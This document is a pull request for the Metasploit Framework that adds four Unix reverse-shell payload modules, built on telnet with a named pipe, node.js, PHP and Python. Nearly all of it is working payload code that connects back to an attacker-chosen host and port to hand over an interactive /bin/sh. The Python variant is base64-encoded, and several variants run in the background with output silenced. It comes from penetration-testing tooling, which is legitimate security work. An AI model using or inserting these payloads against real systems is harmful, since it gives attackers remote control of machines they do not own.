### PR TITLE
Add reverse cmd shells for unix systems

### DIFF
--- a/modules/payloads/singles/cmd/unix/reverse_bash_telnet.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_bash_telnet.rb
@@ -1,0 +1,62 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Unix Command Shell, Reverse TCP (telnet)',
+			'Version'       => '$Revision$',
+			'Description'   => %q{
+				Creates an interactive shell via mknod and telnet.
+				This method works on Debian and other systems compiled
+				without /dev/tcp support. 
+				},
+			'Author'        => 'RageLtMan',
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'unix',
+			'Arch'          => ARCH_CMD,
+			'Handler'       => Msf::Handler::ReverseTcp,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadType'   => 'cmd_bash',
+			'RequiredCmd'   => 'bash-tcp',
+			'Payload'       =>
+				{
+					'Offsets' => { },
+					'Payload' => ''
+				}
+			))
+	end
+
+	#
+	# Constructs the payload
+	#
+	def generate
+		vprint_good(command_string)
+		return super + command_string
+	end
+
+	#
+	# Returns the command string to use for execution
+	#
+	def command_string
+		pipe_name = Rex::Text.rand_text_alpha( rand(4) + 8 )
+		cmd = "mknod #{pipe_name} p && telnet #{datastore['LHOST']} #{datastore['LPORT']} 0<#{pipe_name} | $(which $0) 1>#{pipe_name} & sleep 10 && rm #{pipe_name} &"
+	end
+end

--- a/modules/payloads/singles/cmd/unix/reverse_js.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_js.rb
@@ -1,0 +1,77 @@
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Unix Command Shell, Reverse TCP (via JS)',
+			'Description'   => 'Creates an interactive shell via JS',
+			'Author'        => [
+        'RageLtMan', # Port to MSF
+        'evilpacket' # Original shell at https://github.com/evilpacket/node-shells/blob/master/node_revshell.js
+        ],
+			'License'       => BSD_LICENSE,
+			'Platform'      => 'unix',
+			'Arch'          => ARCH_CMD,
+			'Handler'       => Msf::Handler::ReverseTcp,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadType'   => 'cmd',
+			'RequiredCmd'   => 'js',
+			'Payload'       =>
+				{
+					'Offsets' => { },
+					'Payload' => ''
+				}
+			))
+	end
+
+	#
+	# Constructs the payload
+	#
+	def generate
+		vprint_good(command_string)
+		return super + command_string
+	end
+
+	#
+	# Returns the command string to use for execution
+	#
+	def command_string
+
+ 		lhost = Rex::Socket.is_ipv6?(lhost) ? "[#{datastore['LHOST']}]" : datastore['LHOST']
+		cmd   = <<EOS
+var net = require("net");
+util = require("util");
+spawn = require("child_process").spawn;
+sh = spawn("/bin/sh",[]);
+HOST="#{lhost}";
+PORT="#{datastore["LPORT"]}";
+function c(HOST,PORT) {
+    var client = new net.Socket();
+    client.connect(PORT, HOST, function() {
+        client.pipe(sh.stdin);
+        util.pump(sh.stdout,client);
+    });
+    client.on("error", function(e) {
+        setTimeout(c(HOST,PORT), 5000);
+    });
+}
+c(HOST,PORT);
+EOS
+    return "js -e '#{cmd.gsub("\n",'').gsub(/\s+/,' ').gsub(/[']/, '\\\\\'')}' >/dev/null 2>&1 & "
+  end
+end

--- a/modules/payloads/singles/cmd/unix/reverse_php.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_php.rb
@@ -1,0 +1,61 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Unix Command Shell, Reverse TCP (via php)',
+			'Version'       => '$Revision$',
+			'Description'   => 'Creates an interactive shell via php',
+			'Author'        => 'RageLtMan',
+			'License'       => BSD_LICENSE,
+			'Platform'      => 'unix',
+			'Arch'          => ARCH_CMD,
+			'Handler'       => Msf::Handler::ReverseTcp,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadType'   => 'cmd',
+			'RequiredCmd'   => 'php',
+			'Payload'       =>
+				{
+					'Offsets' => { },
+					'Payload' => ''
+				}
+			))
+	end
+
+	#
+	# Constructs the payload
+	#
+	def generate
+		vprint_good(command_string)
+		return super + command_string
+	end
+
+	#
+	# Returns the command string to use for execution
+	#
+	def command_string
+		lhost = datastore['LHOST']
+		ver   = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
+		lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
+		cmd = "php -r '$s=fsockopen(\"#{datastore['LHOST']}\",#{datastore['LPORT']});exec(\"/bin/sh -i <&3 >&3 2>&3\");'&"
+	end
+
+end

--- a/modules/payloads/singles/cmd/unix/reverse_python2.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_python2.rb
@@ -1,0 +1,78 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Unix Command Shell, Reverse TCP (via Python loop)',
+			'Version'       => '$Revision$',
+			'Description'   => 'Creates an interactive shell via python, encodes with base64 by design.',
+			'Author'        => 'RageLtMan',
+			'License'       => BSD_LICENSE,
+			'Platform'      => 'unix',
+			'Arch'          => ARCH_CMD,
+			'Handler'       => Msf::Handler::ReverseTcp,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadType'   => 'cmd',
+			'RequiredCmd'   => 'python',
+			'Payload'       =>
+				{
+					'Offsets' => { },
+					'Payload' => ''
+				}
+			))
+	end
+
+	#
+	# Constructs the payload
+	#
+	def generate
+		vprint_good(command_string)
+		return super + command_string
+	end
+
+	#
+	# Returns the command string to use for execution
+	#
+	def command_string
+		cmd = ''
+		dead = Rex::Text.rand_text_alpha(2)
+		# Set up the socket
+		cmd += "import socket,subprocess,os\n"
+		cmd += "s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n"
+		cmd += "s.connect(('#{datastore['LHOST']}',#{datastore['LPORT']}))\n"
+		# The actual IO
+		cmd += "#{dead}=False\n"
+		cmd += "while not #{dead}:\n"
+		cmd += "\tdata=s.recv(1024)\n"
+		cmd += "\tif len(data)==0:\n\t\t#{dead} = True\n"
+		cmd += "\tproc=subprocess.Popen(data,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n"
+		cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n"
+		cmd += "\ts.send(stdout_value)\n"
+
+		# The *nix shell wrapper to keep things clean
+		# Base64 encoding is required in order to handle Python's formatting requirements in the while loop
+		cmd = "python -c \"exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))\""
+		cmd += ' >/dev/null 2>&1 &'
+		return cmd
+
+	end
+
+end


### PR DESCRIPTION
This commit separates out the non-ssl shells from the SVIT repo
and avoids modifications to lib. Of note are reverse shells in
php and javascript (node.js). 

The latter is integration of code found at https://github.com/evilpacket/node-shells.
